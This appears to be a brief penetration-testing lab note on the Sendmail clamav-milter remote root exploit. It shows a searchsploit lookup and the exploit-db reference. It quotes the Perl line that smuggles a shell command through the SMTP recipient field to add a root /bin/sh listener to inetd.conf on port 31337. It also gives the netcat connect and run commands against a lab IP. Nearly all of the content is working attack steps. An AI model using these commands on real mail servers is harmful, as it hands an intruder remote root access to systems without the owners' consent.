ClamAV
Search vulnerability  
searchsploit clamav
Sendmail w/ clamav-milter Remote Root Exploit https://www.exploit-db.com/exploits/4761
# You can run an arbitrary command after nobody+\"| 
print $sock "rcpt to: <nobody+\"|echo '31337 stream tcp nowait root /bin/sh -i' >> /etc/inetd.conf\"@localhost>\r\n";# Netcat listener
kali> nc 192.168.174.42 31337 
# Exploit 
# Modify the perl script and then execute the script
kali> perl 4761.pl 192.168.174.42
Last updated